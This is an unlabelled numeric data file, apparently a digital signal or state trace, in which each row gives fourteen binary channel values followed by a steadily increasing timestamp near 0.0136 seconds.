1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592308e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592456e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592656e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592708e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592856e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592908e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3592956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3592980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593056e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593108e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593308e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593456e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593656e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593708e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.3593756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.3593780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.3718556e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.3718756e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3718780e-02 0,0,0,1,1,0,0,0,0,0,0,1,0,1,1.3718812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3718832e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3719140e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3719164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3719188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3719212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3719236e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3719264e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3719288e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3719316e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3719340e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3719364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719464e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719488e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719508e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719540e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719636e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719664e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719708e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719736e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719864e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719884e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719908e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719936e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3719964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3719988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720036e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720064e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720084e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720108e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720136e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720236e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720264e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720284e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720308e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720336e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720388e-02 0,0,0,1,1,0,0,0,0,1,0,0,0,0,1.3720412e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720416e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720464e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720496e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720512e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720536e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720540e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720564e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720588e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720612e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720636e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720664e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720684e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720708e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720736e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720764e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720788e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3720836e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3720864e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720868e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720888e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720908e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3720964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3720988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721036e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721064e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721088e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721116e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721140e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721236e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721264e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3721268e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3721316e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3721340e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721348e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721364e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721464e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721488e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721564e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721588e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721612e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721636e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721664e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721688e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721716e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721740e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721764e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721788e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721840e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721864e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3721868e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3721916e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3721940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721948e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3721964e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3721988e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722036e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722064e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722088e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722112e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722140e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722164e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722188e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722212e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722236e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722264e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722288e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722312e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722340e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722364e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722464e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722564e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722588e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722612e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722636e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722664e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722684e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722736e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722764e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722788e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722836e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722864e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722884e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722936e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3722964e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3722988e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723036e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723064e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723136e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723160e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723188e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723212e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723236e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723336e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723360e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723536e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723560e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723588e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723612e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723636e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723660e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723684e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723736e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723764e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723788e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723836e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723860e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723884e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723936e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3723960e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3723988e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724036e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724060e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724136e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724160e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724188e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724212e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724236e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724336e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724360e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724536e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724560e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724588e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724612e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724636e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724660e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724684e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724736e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724760e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724788e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724836e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724860e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724884e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724936e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3724960e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3724988e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725036e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725060e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725112e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725136e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725160e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725188e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725212e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725236e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725336e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725360e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725532e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725584e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3725608e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3725636e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3850460e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3850692e-02 1,0,0,1,1,0,0,0,0,0,0,1,0,1,1.3850720e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3850748e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3851040e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3851076e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3851100e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3851124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3851148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3851172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3851196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3851224e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.3851248e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3851276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851292e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851300e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851324e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851348e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851372e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851396e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851424e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851448e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851476e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851500e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851524e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851548e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851572e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851596e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851624e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851648e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851676e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851700e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851720e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851748e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851772e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851820e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851896e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851920e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851948e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3851972e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3851996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852096e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852120e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852148e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852268e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852296e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852320e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3852324e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.3852372e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.3852396e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852404e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852420e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852444e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852468e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852496e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852624e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.3852648e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.3852700e-02 